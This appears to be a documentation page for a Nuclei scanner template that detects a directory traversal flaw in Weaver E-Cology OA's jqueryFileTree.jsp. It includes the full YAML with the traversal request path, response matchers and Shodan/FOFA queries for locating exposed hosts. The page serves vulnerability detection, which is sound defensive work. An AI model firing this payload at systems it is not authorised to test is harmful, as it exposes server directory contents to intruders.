Weaver E-Cology JqueryFileTree - Directory Traversal
ID: ecology-jqueryfiletree-traversal
Severity: medium
Author: SleepingBag945
Tags: weaver,ecology,traversal,lfr
Description
Section titled “Description”Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability.
YAML Source
Section titled “YAML Source”id: ecology-jqueryfiletree-traversal
info: name: Weaver E-Cology JqueryFileTree - Directory Traversal author: SleepingBag945 severity: medium description: | Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md?plain=1#L24 classification: cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: weaver product: e-cology shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" tags: weaver,ecology,traversal,lfr
http: - method: GET path: - "{{BaseURL}}/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../"
matchers-condition: and matchers: - type: word words: - "'index.jsp','" - "重命名" - "新建目录" condition: and
- type: status status: - 200# digest: 4a0a0047304502203a4153026b6ee822cde6ad9204bba62eac7c2517dbfbf4d23b5ba4a6a9bb756d022100b09aeaaa6c32d993b1331ba4be6ba7c0ea062a6dfef891fcb2f624e92c9be907:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml"